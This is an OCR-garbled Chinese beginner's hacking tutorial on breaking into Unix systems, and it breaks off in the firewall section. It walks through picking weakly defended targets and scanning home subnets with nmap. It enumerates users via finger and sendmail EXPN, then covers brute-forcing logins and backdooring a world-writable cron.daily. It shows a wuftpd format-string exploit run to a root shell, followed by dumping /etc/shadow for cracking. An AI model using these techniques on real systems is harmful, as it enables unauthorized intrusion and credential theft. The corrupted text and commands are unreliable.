Unix黑客初学者指导

1、unix黑客初学者指导no首先说一下写这篇文章的目的，近來越來越多的人问我诸如“我如何能够黑了 hotmaif5或者aol等等一些其它的愚蠢的问题。这篇文章将确实的向你解释关于 “hack”的一些知识。如果你是个初学者，你应当从头到尾通读这篇文章，或者如 果你已经进阶了，那就别再往下看了，你应该全都了解的。我或许将往这篇文章 屮添加一些内容或者让他变得更易于理解。我写这篇文章的最根本的原因是，让 别人不再來问我或者其他人如何去做*愚蠢*的事，是的，问如何去黑（how tohack）是*愚蠢*的，它讣你看起来愚蠢并且学不到任何东西，当然除非你完全 不能自学的话。起初当我想弄乱别人的电脑时，我只是

2、一个小学的小孩子。我问别人有关病毒和 木马的事，并且使用它们，那时我是一个lamer 子，不完整的）。我在学校里 问别人并且最终发现一个对hacking感兴趣的人。他向我展示一些技巧，我付给 他钱。（snowblue：现在有sql,无用等一些高手义务的帮助你们，而你们却不 好好的珍惜）他使用unix很多年了，他叫我去找一个shello我不知道那是什 么意思。他说那是对unix系统的访问权限。我仍然有点迷惑，最终我得到了一 个shello我读所有我能够找到的，把所有的时间都花在计算机上，我开始对社 会和现实世界失去兴趣。那时候我每犬在计算机上花的时间超过12个小时。我 读任何找到的资料，我读的第

3、一篇文章是“mostlyharmlesshacking"（几乎没有破坏性的入侵），我对它很感兴趣。起初我只会用一些图形模 式的工具来做一些像改变关机屏幕的简单的事。做有关hacking的网站，尽管我 并不知道hacking究竞是什么。我收集windows b的木马和病毒等一些工具，尽 管那并不是hacking,但那吋候我喜欢它们。随后我开始用邮件炸弹，flooded dos。当我对他们有了 了解后，（我意识到那并不是hacking）®冋去继续寻找shell。 当时我所能找到的免费的shell都是非常简单的。我听说了有关linux的一些事。 我问我学校的“黑客朋友"

4、，他说不要用linux,用真正的unixo他搬到了 pa,从 那以后我再也没有他的咅讯。我试图找到他并感谢它所教给我的，但没有成功。 我得到了一个linuxo安装是文本模式的，但它运行很迅速，它比windows耍可 乱说话多了，从不死机。但我的56kmodem不能工作，我跑到了 irc问有关linux的问题。我发现了我的modem是 一种叫winmodem的，win-moden是由软件控制的，他们通常比硬件modem慢, 并fl不能再linux卜工作o （snowblue：现在大多数的modem在linux b都有驱动, 你可以自己寻找）我在命令行下模式工作，看自己能够干些什么。最终我花了 1

5、00美元买了一个linux兼容的modem。我让他工作，这太棒了。从那以后我就 使用它，并且仍然可以在那上而学到更多的东西。我的父母说我“对计算机着魔 了”，我试图解释我并没有。我从没有对它感到厌烦，我一直能够学到新的东西。 那段时间里，我失去了一些朋友，退出了大学足球队。所有的一切仅仅是为了这 该死的机器。希望某人可以发现这篇文章很有用。目录1. 普通的知识2. 需要的东西3. 简单的入侵4. 如何进入5. 列举6. 常见的失误7. 缓冲溢出8. 防火墙9. 进入z后干些什么10. 如何才能不被抓住11清除纪录12. 用途13. 我对破坏者的看法否认声明：阅读这篇文章说明你同意隶屈t roo

6、t-access的任何人都不对你通过看这篇文章 所造成的任何后果负责1.读这篇文章的最好方法是一次把它读完，然后再读一遍。好吧，现在让我们开始。 我假设你已经有了一些基木的知识，知道telnet是什么，一些基本的tcp/ip的知 识等等。如果有一些你并不理解,不要犹豫,加入 _l的#rootaccess, 那是我常去的地方。需要的东西：2.我列出了一些在这篇教程中需要的东西。你可以在anti-和 找到它们。用引擎找一下就可以了。1. - superscan (for windows)2. nmap (for unix)3. - full shell access (the very best

7、is if you have linux or bsd orsolaris or another unix os)4. - compiler on the shell5. wingates (you can use them as telnet proxys)容易的口标：3.这里我讲一下如何找到一些容易的目标1. 到用口语或其他语言搜索“游戏”，理由是这些站点的安全性较 低2.扫描一个有很多服务的cable或者dsl子网，你可以用nmap,端口的状态应当是 open而不是close或者filtered, nmap的扫描报告会告诉你的。我将不会告诉你 如何使用namp,原因是manpage已经冇

8、作够的信息了。2. 确保nmap ll经被安装了。使用下面我给出的命令(注意：$是一个普通的用户，而#则是超级用户。作为例子，我用了 24.112.*.*, 吧它替换成你想要扫瞄的ip)$nmap p 21,23 24.112.*.*进入：4.为了能够进入，你应当收集尽可能多的有关口标主机的信息。由于这是你的第一 次入侵，所以确保它冇一个笨笨的管理员。然后你可以使用exploito我将在后而 详细解释列举：5. ok我们找到了目标。现在让我们得到更多的信息。首先來telnet它的79端口。如 果它是打开的，你就可以得到以登陆用户的信息。仅仅是telnet然后按下回车。 让我们假定端口是打开的并

9、月允许我们查看在线用户。看下而的例子：$ telnet target.domain 79trying ipaddress.connected to target.domain.escape character is a.login name tty idle login time office office phonegt grahm crackhead / i sep 1 12:01ok如果你得到了一个login,把它记下來，然后找更多的login。或许你需要暴力穷 句。你可以在 找到一个windows下的穷具工具。使用大量的单词来穷举那个账号。如果你得 至！j的消息是”no one is

10、logged on"或许你需要一个 windows下的haktek。同样，你可以在 找到它。haketk能够让你监视finger进程并且纪录登陆的人。这是很有用的。另 一种方法，你可以用sendmailo如呆他们有很多的用户，你可以尝试telnet并且 找儿个有效的用户名，还可以找儿个程序通过暴力法来完成。看下面，我给出了 通过sendmail来得到有效的用户名的例子一$ telnet target.domain 25trying ipaddress.connected to targe匸domain.escape character is a.220 target.domain e

11、smtp sendmail 8.9.3/&9.3; fri, 1 sep 2000 12:11:00-0400expn wally250 wally kolcunvrfy wally250 wally kolcunexpn billy550 billy. user unknown就像你所看到的，我telnet到他们的smtp,敲入expn,然后系统告诉我这是不 是一个有效的用户，最后我给出了一个用户不存在的例子，当我敲入expn billy,系统告诉我用户不存在，然后我知道这不是一个合法的用户。这同样可以 帮助你得到他们的email,然后你就可以尝试一下社会工程学。另一个搜集用户名的方

12、法可以是利用usenet, altavista,你可以搜索一卜新闻组，或 许可以得到一些有用的信息。另一些可以利用的进程是systat netstat等等。telnet还可以帮助你判断出对方的操作系统，当你想exploit吋这是非常重要的。当telnet时，冇些会给出系统信息，如下所示：trying ipaddress.connected to target.domain.escape character is a.red hat linux release 6(cartman)kernal 2.2.12-20 on an i586login:你可以看至！j,系统是redhat 6.1有些时候

13、你可以使用社会工程学，拿kevinmitnick举个例子。它使用社会工程学进入了 novell, 个很大的系统。它所作 的只是像一个在那里工作的人那样和别人交谈。他知道当时那里的某人止在度 假，但是他知道某人的名字。他打电话到了 novell的办公室找那个人，然后秘 书告诉他那个人正在度假，然后他说它需要和那个人联系，于是它便从秘书那里 得到了那个人的信息。常见的失误：6.人们会时不时的犯一些错误。这可以帮助你进入。某些人并不是很好的管理员。 一个十分普遍的失误是权限设置上的错误。有些系统对所有人都开放了 write权 限。这是一个很大的问题。让我们举个例子。某人把cron.daily的wri

14、te权限开放 给所有人。你就口j以上传一个后门程序并通过cron进程来执行，从而得到系统 的访问权。现在让我来告诉你最可怕的事。假如某个用户在系统上使用irc,并且如果它把 dec文件传送设置为口动接收，接受目录为他的主目录。你就可以传给他一 .bash_profile,文件写的好的话，可以让他做一些事。例如添加一个用户，或 者把密码邮寄给某人。很显然这是进入系统的最简单的方法。缓冲溢出/exploiting：7. 我不打算对缓冲溢出讲得太深，我只想借是那是什么然后进入下一节。 缓冲溢出一在进程上有一个叫缓冲限制的东西。缓冲限制限制了进入的字节数。 某些情况下，你可以通过特殊的代码让缓冲区溢出

15、来得到一个root用户或者普 通用户。有一个例子是wu-ftpd260(1)的缓冲溢出。卜面我将告诉你：$ gcc wuftpd-god.c wuftpd-god$ ./wuftpd-god -husage: ./wuftpd-god -t f-1 user/pass -s systype -o offset卜g卜h卜x-m magic_str -r ret_addr -p padding -p pass_addr -m dirtarget: host with any wuftpduser : anonymous userdir : if not anonymous user, you ne

16、ed to have writable directorymagic_str : magic string (see exploit description)-g : enables magic string digging-x : enables test modepass_addr : pointer to setproctitle argumentret_addr : this is pointer to shellcodesystypes:0 - redhat 6.2 (?) with wuftpd 2.6.0( 1) from rpm1 - redhat 6.2 (zoot) wit

17、h wuftpd 2.6.0(l) from rpm2 - suse 6.3 with wuftpd 2.6.0(l) from rpm3 - suse 6.4 with wuftpd 2.6.0(l) from rpm4 - redhat 6.2 (zoot) with wuftpd 2.6.0(l) from rpm (test)5 - freebsd 3.4-stable with wuftpd 2.6.0(l) from ports* 6 freebsd 3.4-stable with wuftpd 2.6.0(l ) from packages7 - freebsd 3.4-rele

18、ase with wuftpd 2.6.0(l) from ports8 - freebsd 4.0-release with wuftpd 2.6.0(l) from packages$ ./wuftpd-god -so -t target.domaintarget: target.domain (ftp/): redhat 6.2 (?) with wuftpd 2.6.0(l) from rpmreturn address: 0x08075844, addrretaddr: 0xbfffb02& shellcode: 152loggin into system.32muser f

19、tpom331 guest login ok, send your complete e-mail address as password.32mpass0m230-next time please use your e-mail address as your password230- for example: joecc456375-230 guest login ok, access restrictions apply.step 2 : skipping, magic number already exists: 87,01:03,02:01,01:02,04step 3 : chec

20、king if we can reach our return address by format stringlinux melmac 22145.0 #1 tue mar 7 21:07:39 est 2000 i686 unknownuid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp)#如果你想耍root的话,exploit是一种方法。查出系统的操作系统,然后到hack.co.za 或者 packetstorm查找那个系统的exploit,你应当得到一些peil scripts/c scripts/shell scripts执行 它们，你

21、就会成为root当然，如果系统打了 exploit的补丁，你或许想知道root的口令是什么。可以敲 下而的命令：(如果没有经过shadow, 口令被存放于/etc/passwd)# cat /etc/shadow > /root/passwd root:34jk3h4jh3.,;8363:0:0:root:/root:/bin/bash bin:x:l:l:bin:/bin:daemon:x:2:2img/image/bbs3000/teeth_smile.gif/imgae mon:/sbin:adm:x:3:4:adm:/var/adm:lp:x:4:7:lp:/v

22、ar/spool/lpd:sync:x:5:0lmg/image/bbs3()()()/confused_smile.gif/imgy nc:/sbin:/bin/sync shutdown:x:6:0img/image/bbs3000/confused_smile.gif/i mghutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:news:x:9:13:news:/var/spool/news:uucp:x: 10:14:

23、uucp:/var/spool/uucp:operator:x:ll :0img/image/bbs3000/omg_smile.gif/imgp erator:/root:games:x:l 2:100:games:/usr/games:sympa:x:89:89img/image/bbs3000/confused_smile.gif/im gjympa mailing list manager:/home/sympa:/bin/bashgopherix: 13:30:gopher:/usr/lib/gopher-data:ftp:x:14:50:ftp

24、user:/home/ftp:nobody:x:99:99:nobody:/:xfs:x:100:103:x font server:/etc/x 1 l/fs:/bin/falsefax:x: 10:14:fax master:/home/fax/:/bin/bashpostfix:x:101:233img/image/bbs3000/tounge_smile.gif/imgostfix:/var/spool/postfix:gdm:x:42:235:/home/gdm:/bin/bashgrim:9hu.u8:50l :501 :grim:/home/grim:/bin/

25、bashbanal:x:102:236:banal administrator:/home/banal:/bin/bash bleeb:36.34/363;86:502:506:/home/bleeb:/bin/bash上面就是/etc/passwd的内容，但是你需要破解他们，可以用john theripper,可以在packetstorm或jt他地方找到它。我就用它，他很快。（snowbue： 支持国产，你可以用小榕的乱刀可以在在下载）有吋破解一个账号要用几年的吋间，所以我 并不提倡这种做法。防火墙：8. 如果你了解你所作的，防火墙并不能阻止你。我很喜欢用nmap,这个工具 非常好。在 可以找到最新的版木。我喜欢它的os （操作系统）检测，即使口标只运行了很 少的服务，它的检测也很准确。它通过分析廿标的tcp指纹并于自身携带的数据 库作比较來得到结果。下面给出一个使用nmap來查出防火墙规则的例了。敲入 nmap-sa